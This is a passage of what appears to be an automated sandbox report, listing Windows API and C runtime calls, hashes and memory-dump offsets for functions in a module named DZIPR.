                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                          • String ID:
                          • API String ID: 3322701435-0
                          • Opcode ID: 6de9409043ffa3eff2749ed297672167a7058a02fd07d3ac5e2c40d580a5cace
                          • Instruction ID: f42d85685749dc2823f2ff0099dbf4c91432b492bc4871ce6c066a78f9031990
                          • Opcode Fuzzy Hash: 6de9409043ffa3eff2749ed297672167a7058a02fd07d3ac5e2c40d580a5cace
                          • Instruction Fuzzy Hash: 3411B175390305ABE620DE64CCC4F6777ADEB85744F601928F6829B281D660BC0D8675
                          APIs
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ParentWindow$ActiveEnableEnabledLastPopup
                          • String ID:
                          • API String ID: 2630416829-0
                          • Opcode ID: 8e98bba7c9034abbbe09b7a44675ff67542ba07f63f115fc5ccd7b7bd3314ae8
                          • Instruction ID: 7c8f9b044678535469de7d47768863458b89a6c4f9eeff13c78793652eb5063a
                          • Opcode Fuzzy Hash: 8e98bba7c9034abbbe09b7a44675ff67542ba07f63f115fc5ccd7b7bd3314ae8
                          • Instruction Fuzzy Hash: 7C110A72646630ABDB1A065A8C40B5A73B86F45B58F1A1253EC1CE7A04F720DC0146D7
                          APIs
                          • lstrlenW.KERNEL32(?,?,?), ref: 6C53DA3D
                          • _memset.LIBCMT ref: 6C53DA5B
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6C53DA75
                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6C53DA87
                          • SetWindowTextW.USER32(00000000,?), ref: 6C53DA93
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                          • String ID:
                          • API String ID: 4273134663-0
                          • Opcode ID: 68e161e92b75328c2001c19d746ccfd187ddd1f9d586053de50e040547eda715
                          • Instruction ID: a22fb3b6c27ac761b6d949ab31f81d090fcc58773af7878e485f08a2ed74d842
                          • Opcode Fuzzy Hash: 68e161e92b75328c2001c19d746ccfd187ddd1f9d586053de50e040547eda715
                          • Instruction Fuzzy Hash: F601D2B6611329A7CB00EAB4CD88DEF77BDEF85704F414466E909D3201EA30CA088BA0
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 6C53DB6D
                          • GetDlgCtrlID.USER32(00000000), ref: 6C53DB81
                          • GetWindowRect.USER32(00000000,?), ref: 6C53DBA3
                          • PtInRect.USER32(?,?,?), ref: 6C53DBB3
                          • GetWindow.USER32(?,00000005), ref: 6C53DBC0
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: RectWindow$ClientCtrlScreen
                          • String ID:
                          • API String ID: 4072766398-0
                          • Opcode ID: edeea795aa9d2276fbaac42343cddb5390ddcc5f95a3cad0f5d0950a23d661ed
                          • Instruction ID: 2649b2e380c8888395d10d2346716016e7496fc9bb43d62baae665849f0474b5
                          • Opcode Fuzzy Hash: edeea795aa9d2276fbaac42343cddb5390ddcc5f95a3cad0f5d0950a23d661ed
                          • Instruction Fuzzy Hash: CF01AD32250129BBCF029B558C18EAE3B7CFF42351F424122F915D21A0E734D516CB99
                          APIs
                          • __lock.LIBCMT ref: 6C544636
                            • Part of subcall function 6C54A914: __mtinitlocknum.LIBCMT ref: 6C54A92A
                            • Part of subcall function 6C54A914: __amsg_exit.LIBCMT ref: 6C54A936
                            • Part of subcall function 6C54A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6C54A93E
                          • ___sbh_find_block.LIBCMT ref: 6C544641
                          • ___sbh_free_block.LIBCMT ref: 6C544650
                          • HeapFree.KERNEL32(00000000,00000000,6C55E828,0000000C,6C54A270,00000000,?,6C54A5D4,00000000,00000001,00000000,?,6C54A89E,00000018,6C55E978,0000000C), ref: 6C544680
                          • GetLastError.KERNEL32(?,6C54A5D4,00000000,00000001,00000000,?,6C54A89E,00000018,6C55E978,0000000C,6C54A92F,00000000,00000000,?,6C54A32A,0000000D), ref: 6C544691
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 6324808383810470a7ebb301a1e41bc6e0c8e15f2d9ae87e1955bb9bce2e6e8f
                          • Instruction ID: cb19702800f9ad3af3779d5032ff837c55c45aff0566f51efb7194b21503303b
                          • Opcode Fuzzy Hash: 6324808383810470a7ebb301a1e41bc6e0c8e15f2d9ae87e1955bb9bce2e6e8f
                          • Instruction Fuzzy Hash: 1A01F431985715EBEF205FB19C08B9E3B749F4272AFB1C119E014BAA90CB78D944CB99
                          APIs
                          • TlsFree.KERNEL32(?,?,?,6C53C179), ref: 6C53C13B
                          • GlobalHandle.KERNEL32(?), ref: 6C53C149
                          • GlobalUnlock.KERNEL32(00000000), ref: 6C53C152
                          • GlobalFree.KERNEL32(00000000), ref: 6C53C159
                          • RtlDeleteCriticalSection.NTDLL ref: 6C53C163
                            • Part of subcall function 6C53BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6C53BFBC
                            • Part of subcall function 6C53BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BFCC
                            • Part of subcall function 6C53BF5D: LocalFree.KERNEL32(?), ref: 6C53BFD5
                            • Part of subcall function 6C53BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6C53BFE7
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                          • String ID:
                          • API String ID: 1549993015-0
                          • Opcode ID: 4ebf31c8de507c79b72e92fda8916e4ffeac018bea662d2e61a1e27eeed3f680
                          • Instruction ID: 41d0211ebf71896d573cdae9a70beeeafcd7cd3b21ac917513f5084d2bf9a4ee
                          • Opcode Fuzzy Hash: 4ebf31c8de507c79b72e92fda8916e4ffeac018bea662d2e61a1e27eeed3f680
                          • Instruction Fuzzy Hash: 5DF08236351A209BDB106B389C4CE1B37B9AFC66647A61709F529D3641EB30E8038B79
                          APIs
                          • GetMenuCheckMarkDimensions.USER32 ref: 6C5396F2
                          • _memset.LIBCMT ref: 6C53976A
                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6C5397E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: BitmapCheckDimensionsLoadMarkMenu_memset
                          • String ID:
                          • API String ID: 3130454499-3916222277
                          • Opcode ID: 8cce85264133c8ead5a01c255ecc33b228f9823961638ab54ff1108a37a037f5
                          • Instruction ID: f19a0f79bb97e452108395271d093f085d6c3b1e3c9d6bf7f4ce0a37ff7e3930
                          • Opcode Fuzzy Hash: 8cce85264133c8ead5a01c255ecc33b228f9823961638ab54ff1108a37a037f5
                          • Instruction Fuzzy Hash: 823105B1B002259BEF108F689CC9BA97BB4FB45308F5540AAE549EB2C1EF309D498F50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __calloc_crt
                          • String ID: $Vl$ }Vl
                          • API String ID: 3494438863-1179181909
                          • Opcode ID: 545d1496f748d5069160ff75c9f603404445fab0877e65e82821298b8da79b8a
                          • Instruction ID: eb7c9c15f0c3fe5238345235e05ff92bd24f0dfb3bd90d7cfe253d59c345f3ba
                          • Opcode Fuzzy Hash: 545d1496f748d5069160ff75c9f603404445fab0877e65e82821298b8da79b8a
                          • Instruction Fuzzy Hash: 511102327492118BF714CE1FAC507A533F5EBCA378B29872AE210CBBA0E730D8814259
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 6C54C7D6
                            • Part of subcall function 6C54C731: ___BuildCatchObjectHelper.LIBCMT ref: 6C54C767
                          • _UnwindNestedFrames.LIBCMT ref: 6C54C7ED
                          • ___FrameUnwindToState.LIBCMT ref: 6C54C7FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                          • String ID: csm
                          • API String ID: 2163707966-1018135373
                          • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                          • Instruction ID: 577c6b5635fe870d6dba775691e779a30cf482fb2e654b790f410383bf85a7b8
                          • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                          • Instruction Fuzzy Hash: 4901E432041109FBDF126E51CD84EEA7F6AEF99358F108014BD1855A20DB32A9B9EBA1
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,6C5477D7), ref: 6C54ED7C
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6C54ED8C
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          • Opcode ID: a1f662c107b31ef60b0de7273b3cc11d2bd3e371e0ba03201a6c6efccc6b8f59
                          • Instruction ID: c2762ef1b8a68abb88a2b685de755d3cc5faf0464c74f019e60fc0d1c3fcdba3
                          • Opcode Fuzzy Hash: a1f662c107b31ef60b0de7273b3cc11d2bd3e371e0ba03201a6c6efccc6b8f59
                          • Instruction Fuzzy Hash: F6F03030A40A09D2DF005BA1AD1976FBE79BB82756FC20994E196A0484DF7080B493DA
                          APIs
                          • ___addlocaleref.LIBCMT ref: 6C55054E
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(00000000), ref: 6C550426
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550433
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550440
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C55044D
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C55045A
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550476
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550486
                            • Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C55049C
                          • ___removelocaleref.LIBCMT ref: 6C550559
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(00000000), ref: 6C5504BD
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504CA
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504D7
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504E4
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504F1
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C55050D
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C55051D
                            • Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C550533
                          • ___freetlocinfo.LIBCMT ref: 6C55056D
                            • Part of subcall function 6C5502CB: ___free_lconv_mon.LIBCMT ref: 6C550311
                            • Part of subcall function 6C5502CB: ___free_lconv_num.LIBCMT ref: 6C550332
                            • Part of subcall function 6C5502CB: ___free_lc_time.LIBCMT ref: 6C5503B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                          • String ID: P)Vl
                          • API String ID: 467427115-1966111344
                          • Opcode ID: e95af68279bffe8a97cb0d55f0742fe22e37657ae8075ea4aa5d02fd730f2249
                          • Instruction ID: acc0b10d8ce90267d90969eb2241c2eea3406d1d7c16c153d17aaef693470854
                          • Opcode Fuzzy Hash: e95af68279bffe8a97cb0d55f0742fe22e37657ae8075ea4aa5d02fd730f2249
                          • Instruction Fuzzy Hash: 01E02032D038A1C1CF311938BC902BD12944FC157CBF10117E860E7D4DDB208EA16095
                          APIs
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: File$SizeTime_memset
                          • String ID:
                          • API String ID: 151880914-0
                          • Opcode ID: dabddd06919713192a1652419da99a423e9dd023dffdbd304c04083a1b26b06e
                          • Instruction ID: a7c41c587712fdf9f942bcc3673fe9a2a8adfdede1dbd0ed463e860af4037e75
                          • Opcode Fuzzy Hash: dabddd06919713192a1652419da99a423e9dd023dffdbd304c04083a1b26b06e
                          • Instruction Fuzzy Hash: D1510B71904615DFDB20CF69CD4099ABBF8FB49364B108A1EE4AAD3A90F730E944CB64
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C55084F
                          • __isleadbyte_l.LIBCMT ref: 6C550883
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5440D8,6C55BF84,00000000,00000000,?,?,?,?,6C5440D8,00000000,?), ref: 6C5508B4
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5440D8,00000001,00000000,00000000,?,?,?,?,6C5440D8,00000000,?), ref: 6C550922
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 369870d6e478f33160ce54c7aa4e0cbe7b7552352ec550d3afa5f3bf25afbdf8
                          • Instruction ID: 8703aebca2e6835e29dbcaf66a37ca34d53754edc4709865fac64fa532c79923
                          • Opcode Fuzzy Hash: 369870d6e478f33160ce54c7aa4e0cbe7b7552352ec550d3afa5f3bf25afbdf8
                          • Instruction Fuzzy Hash: 7831DF31A01289EFDB10CF64CC80EAE3BB5BF8131CB9585ABE4649B591DB70D960DB90
                          APIs
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __msize_malloc
                          • String ID:
                          • API String ID: 1288803200-0
                          • Opcode ID: 4418a23d68716759870ba2ccc90ba4d1ed3a2b91bf1739a207bedc299e15f643
                          • Instruction ID: 14c3cad3c9106ad9606e310c64ef40dcff9ffde45a62acffa36d510d0f89a7be
                          • Opcode Fuzzy Hash: 4418a23d68716759870ba2ccc90ba4d1ed3a2b91bf1739a207bedc299e15f643
                          • Instruction Fuzzy Hash: 54215271101630DBCB15AF34DC84A9A7BA5AF81758B20961AD82C8BA56FF30FC44CAA4
                          APIs
                          • GlobalLock.KERNEL32(?), ref: 6C5388E7
                          • lstrcmpW.KERNEL32(00000000,?), ref: 6C5388F4
                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C53892E
                          • GlobalLock.KERNEL32(00000000), ref: 6C538938
                            • Part of subcall function 6C53DAD1: GlobalFlags.KERNEL32(?), ref: 6C53DAE0
                            • Part of subcall function 6C53DAD1: GlobalUnlock.KERNEL32(?), ref: 6C53DAF2
                            • Part of subcall function 6C53DAD1: GlobalFree.KERNEL32(?), ref: 6C53DAFD
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                          • String ID:
                          • API String ID: 2391069079-0
                          • Opcode ID: f78218a98e4be3ba70370e58e928556c0d885d03b5749e71765eb3bb8c57a7d5
                          • Instruction ID: a2ca4acf97305a3a116ae8bf613e9aad72e4b2279c1456a742a8d8396414144d
                          • Opcode Fuzzy Hash: f78218a98e4be3ba70370e58e928556c0d885d03b5749e71765eb3bb8c57a7d5
                          • Instruction Fuzzy Hash: 37116A72600604FACB129BA5CC48DAF7BBDFBC5B18B90041AFA09D6920EB31D914D722
                          APIs
                          • RtlEnterCriticalSection.NTDLL(?), ref: 6C53BFBC
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BFCC
                          • LocalFree.KERNEL32(?), ref: 6C53BFD5
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C53BFE7
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                          • String ID:
                          • API String ID: 2949335588-0
                          • Opcode ID: a09c05574e4989a69fe6aed47aec8c052ef1328561b4ffabab52f4cd587e83f4
                          • Instruction ID: b19b820593d38fbbec5e9cbf0cde99880032e0d80d114af8295774718aa79ea9
                          • Opcode Fuzzy Hash: a09c05574e4989a69fe6aed47aec8c052ef1328561b4ffabab52f4cd587e83f4
                          • Instruction Fuzzy Hash: 52116771601A14EFD714DF58CC84F6AB7B4FF46319F20A42AF16A8BAA1DB71A840CF10
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6C538ED0
                            • Part of subcall function 6C539C7C: __EH_prolog3.LIBCMT ref: 6C539C83
                          • __wcsdup.LIBCMT ref: 6C538EF2
                          • GetCurrentThread.KERNEL32 ref: 6C538F1F
                          • GetCurrentThreadId.KERNEL32 ref: 6C538F28
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CurrentH_prolog3Thread$__wcsdup
                          • String ID:
                          • API String ID: 190065205-0
                          • Opcode ID: 879be1f87e798ebec64e3ad4d358ec12f75b67c90dcc37c893019ef5b8ece092
                          • Instruction ID: 63c9ced782ca4a3677a6094e2a2e19e483794b040fb7677b6e373c6fe780f600
                          • Opcode Fuzzy Hash: 879be1f87e798ebec64e3ad4d358ec12f75b67c90dcc37c893019ef5b8ece092
                          • Instruction Fuzzy Hash: B9216AB0941B54CFC7218F6A894568AFBF8BFA4704B50991FD1AAC7B21DBB0A444CF46
                          APIs
                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C541D33
                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C541D5E
                          • GetCapture.USER32 ref: 6C541D70
                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C541D7F
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: MessageSend$Capture
                          • String ID:
                          • API String ID: 1665607226-0
                          • Opcode ID: 1a23527b5607d6898030e1d3693d707ac03772dc85ecdb2424498d4fb23357d1
                          • Instruction ID: 9b42876b683f17bec0aa157d9f931c2b2ae43bdc54960899a3aefbc1f2a7bb9a
                          • Opcode Fuzzy Hash: 1a23527b5607d6898030e1d3693d707ac03772dc85ecdb2424498d4fb23357d1
                          • Instruction Fuzzy Hash: 550121713502947BDF315B628CCDFDB3E7ADBCAB10F150079B6059A1A6CAA18854DA20
                          APIs
